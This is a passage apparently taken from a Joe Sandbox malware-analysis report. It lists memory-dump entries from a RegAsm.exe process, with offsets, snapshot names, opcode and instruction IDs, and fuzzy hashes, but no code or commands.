                                                                                        • API String ID: 0-3676250632
                                                                                        • Opcode ID: 6d6ee97c22248b070dff93aa28235a52c9020e570131768ded25433d9c18012f
                                                                                        • Instruction ID: c9e7e3ac0ce650a18e042cd41f3683129ce41bbed87e858c32e43ac6c48c02c7
                                                                                        • Opcode Fuzzy Hash: 6d6ee97c22248b070dff93aa28235a52c9020e570131768ded25433d9c18012f
                                                                                        • Instruction Fuzzy Hash: 3F2191357183598BC754DE26A944A7FFBEAFF85210B04C426F916D7644DBB1D8108BB0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d8oq
                                                                                        • API String ID: 0-2048867746
                                                                                        • Opcode ID: 6714cdf6d0a5e0bcf2b4759f4f4e0bdd2319d9fc2c091475df91490ccc0d12d2
                                                                                        • Instruction ID: 8227e120ddfb6113b8038034cb4031c3f8f2a04bb815676aa90e98a8156a7de0
                                                                                        • Opcode Fuzzy Hash: 6714cdf6d0a5e0bcf2b4759f4f4e0bdd2319d9fc2c091475df91490ccc0d12d2
                                                                                        • Instruction Fuzzy Hash: 0E11A031200B014FC7259B2DEC44F6EFBEBAFC5350F048A28D4568B265EBA4E809CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 95efdd09e8b1a41c776c6f8a26a7699bad7b817020b4f948d233c46f7fc7f2d7
                                                                                        • Instruction ID: aa6af5b056f132ff138f7ceb6246b3dc8f7691440df336bd71da68f0ca529f82
                                                                                        • Opcode Fuzzy Hash: 95efdd09e8b1a41c776c6f8a26a7699bad7b817020b4f948d233c46f7fc7f2d7
                                                                                        • Instruction Fuzzy Hash: CC718E347043118FCB259B79E4A463EBBA6BFC9250B144569E9068B399DF35DC42CBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b25899c40725a590dc44248403b0206f189d49911b51d6a807a27f05ea44bd2b
                                                                                        • Instruction ID: 60d1df42c9243cb44a334e3c849eb4a4ab84f972f65aa089992dd69d7e1c04c8
                                                                                        • Opcode Fuzzy Hash: b25899c40725a590dc44248403b0206f189d49911b51d6a807a27f05ea44bd2b
                                                                                        • Instruction Fuzzy Hash: A35181317142159FC754DF39E998E6EBBEAFF4865070584A9E406CB365EB31EC01CB60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bb6ce04d8914aeebe6beb3a588a126e4d5c81a27de24d2f3fe108afb9e54c586
                                                                                        • Instruction ID: 7b524cc8407cffb200139da0652442f8691a618aec164244656f4719ac5f768a
                                                                                        • Opcode Fuzzy Hash: bb6ce04d8914aeebe6beb3a588a126e4d5c81a27de24d2f3fe108afb9e54c586
                                                                                        • Instruction Fuzzy Hash: 1281BF74E412299FDB64DF69D990BEDBBB2BF89300F1080EAD849A7254DB715E81CF40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f1af703b09307ab08c1f2bc1f1100af0451f8603eb5f3d927453457bfaa79c53
                                                                                        • Instruction ID: 8dcce9b12ed6a7e13ce81a3098975a17ea19f5369baa705380f7b1910740ab82
                                                                                        • Opcode Fuzzy Hash: f1af703b09307ab08c1f2bc1f1100af0451f8603eb5f3d927453457bfaa79c53
                                                                                        • Instruction Fuzzy Hash: 80415475E0031A9BDB15CFA5D990AEEFBF2BF88700F148119E406B7254DB71A946CBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 83784281e9f5c631468c0ca24168e6664ebd5ed0546e9c0c0dedb34786e2f80e
                                                                                        • Instruction ID: 5301ec944b6e19357f534a8f6eb3787aa9e4ece3dad68226428b647e3f865278
                                                                                        • Opcode Fuzzy Hash: 83784281e9f5c631468c0ca24168e6664ebd5ed0546e9c0c0dedb34786e2f80e
                                                                                        • Instruction Fuzzy Hash: E0419E3160420A9FCF059FA4E854ABEBFB2FF89211F004019FD569B255DB39D922DFA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a991555f76c4999b4b8cea1306949dcc5f24a8dca03d5e924879bcddc7ccee9c
                                                                                        • Instruction ID: 312a337b315f9f6f3ecdd445079c06cbefef45580b1f9b2ee41f42adba303bee
                                                                                        • Opcode Fuzzy Hash: a991555f76c4999b4b8cea1306949dcc5f24a8dca03d5e924879bcddc7ccee9c
                                                                                        • Instruction Fuzzy Hash: 122180347043014BDB64562AE954B7EA69BFFC5714F14C039D502CB394EE79C84297A0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4533494757.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10ad000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d5e954795c8d452e56872343b38a9245665773de6a30d1c08cb5aad6c9b0ac37
                                                                                        • Instruction ID: 11f388e3c979a839fd94416b4ae9eec9adcdc366eea0972b5705c9e251c90f6c
                                                                                        • Opcode Fuzzy Hash: d5e954795c8d452e56872343b38a9245665773de6a30d1c08cb5aad6c9b0ac37
                                                                                        • Instruction Fuzzy Hash: B5214270144200DFCB11CFD8D980F26BFA5EB84314F60C5AEE9890B652C33AD846CB62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9aa95fd009641a7e766a225e546532938cc44da29434b75dfb446ea3fa22560b
                                                                                        • Instruction ID: 086205875c87c3f503f126e55508788c0c3d21a88c1f2d8154f15656f97e7757
                                                                                        • Opcode Fuzzy Hash: 9aa95fd009641a7e766a225e546532938cc44da29434b75dfb446ea3fa22560b
                                                                                        • Instruction Fuzzy Hash: F2110B317083945FCB065B7898342AF3FA7EFCA210B044469E445DB391DE348C16C3D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3af4b829055b2824989c617aa56ff0e1d241108c08e9641eb6ff9eca40c3de1a
                                                                                        • Instruction ID: 1a3225fecf4a85ee7bf28ba2cda4d85dcac69c34c03fbef568fae620e0063666
                                                                                        • Opcode Fuzzy Hash: 3af4b829055b2824989c617aa56ff0e1d241108c08e9641eb6ff9eca40c3de1a
                                                                                        • Instruction Fuzzy Hash: 551114B68003499FDB10DF99D944BEEBFF5EB48320F148419E518A7250C379A994DFA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2049837a0bf0826d454f6b03863938a366e7eb068de763d54ca957594b19da20
                                                                                        • Instruction ID: 7853de63e2fb8dbf3bebc345d7089792a692080fb412d6c078cc5ef5837d4091
                                                                                        • Opcode Fuzzy Hash: 2049837a0bf0826d454f6b03863938a366e7eb068de763d54ca957594b19da20
                                                                                        • Instruction Fuzzy Hash: B911FA74E002498FDB04DFF9E850BEEFBB6AF48311F5094A5E808AB345EB309941CB60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4533494757.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10ad000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5c3f0733ce8851a1589f40a5fbe057aabe2b6f8a867c37c7fcc40a2fdda36e59
                                                                                        • Instruction ID: a29258a10da7e377812c550737f5c9e18879fd88bfc0aada3ef4e8bbcdf03f86
                                                                                        • Opcode Fuzzy Hash: 5c3f0733ce8851a1589f40a5fbe057aabe2b6f8a867c37c7fcc40a2fdda36e59
                                                                                        • Instruction Fuzzy Hash: 1C11D075544280DFDB12CF98D5C4B15FFB1FB84314F28C6AAD8894BA56C33AD44ACB62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 28266c53005f49fe380e28ca94009228a54442164f67ca34afb96b056020dd7e
                                                                                        • Instruction ID: 11b9c1b7db787c90001afb96d9b2f9d6ecf845afa584934d9220ba277fe156b6
                                                                                        • Opcode Fuzzy Hash: 28266c53005f49fe380e28ca94009228a54442164f67ca34afb96b056020dd7e
                                                                                        • Instruction Fuzzy Hash: 361112B68002499FDB10CF99D944BDEBBF4EB48320F14845AE518A7250D339A694DFA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c3a0b833281871d9b09964ab4e0521f113b1642948d0ace4c215f5ba93a4b00b
                                                                                        • Instruction ID: e37f71875c8cbd0a8a98b6b092a8ea90ccf14117b272957b8cf0794ca2c97dad
                                                                                        • Opcode Fuzzy Hash: c3a0b833281871d9b09964ab4e0521f113b1642948d0ace4c215f5ba93a4b00b
                                                                                        • Instruction Fuzzy Hash: 0901D6327042186B8F059F59AC10AEF7FEBEBC9650F188029F915D7281DE72CC119BA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c3a286e75e9a5852eb931f6efcb5527fef5d8aab1a968b5269c22bb90a0bff1
                                                                                        • Instruction ID: ef1e8f518fe7945b064b28fa3b360196d8c418ad1e05ba690b632a73f642207e
                                                                                        • Opcode Fuzzy Hash: 7c3a286e75e9a5852eb931f6efcb5527fef5d8aab1a968b5269c22bb90a0bff1
                                                                                        • Instruction Fuzzy Hash: A0018172A082196BDF518F95EC01BDF7FAAEBC9750F188029F915C6242DA36C911DBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 56d608db0ef6616fc2d0d76ba8399dd97edc49a6de5f6dc90f7a22a99c669620
                                                                                        • Instruction ID: 2b5e2e2492271f9b25dbb76316a2cebfb1260db0b0e31a476f2ecc83f4250ea1
                                                                                        • Opcode Fuzzy Hash: 56d608db0ef6616fc2d0d76ba8399dd97edc49a6de5f6dc90f7a22a99c669620
                                                                                        • Instruction Fuzzy Hash: E5E0CD350443044FC705EFB9F945F587B6DFB80304F0446209005452AEDE78A10DCB70
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6b7db2a4c09d2f14aa79d90d290936feaf8fb3ab9e715eafe628a91147267788
                                                                                        • Instruction ID: 2779ab0730026518f2512dc1ca2cd120c7cb6e6dc32a3df0923a3fd422535d8b
                                                                                        • Opcode Fuzzy Hash: 6b7db2a4c09d2f14aa79d90d290936feaf8fb3ab9e715eafe628a91147267788
                                                                                        • Instruction Fuzzy Hash: CAD0673AB400189FCB049F98E8508DDFB76FB99221B048116F915E3261CA319925DB50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5adb27970e4d737e3627fd67cf09de3ba67658bb6c3be6d392f62ce716b36ae9
                                                                                        • Instruction ID: 15830ebc2bceaf5d43c37b8805983b4cf7719202886ae8c4374c52b6e94868a1
                                                                                        • Opcode Fuzzy Hash: 5adb27970e4d737e3627fd67cf09de3ba67658bb6c3be6d392f62ce716b36ae9
                                                                                        • Instruction Fuzzy Hash: 90C012700443094EC605FBB5F9459693B2EEAC03047408520A0050D27DDF78684E8B90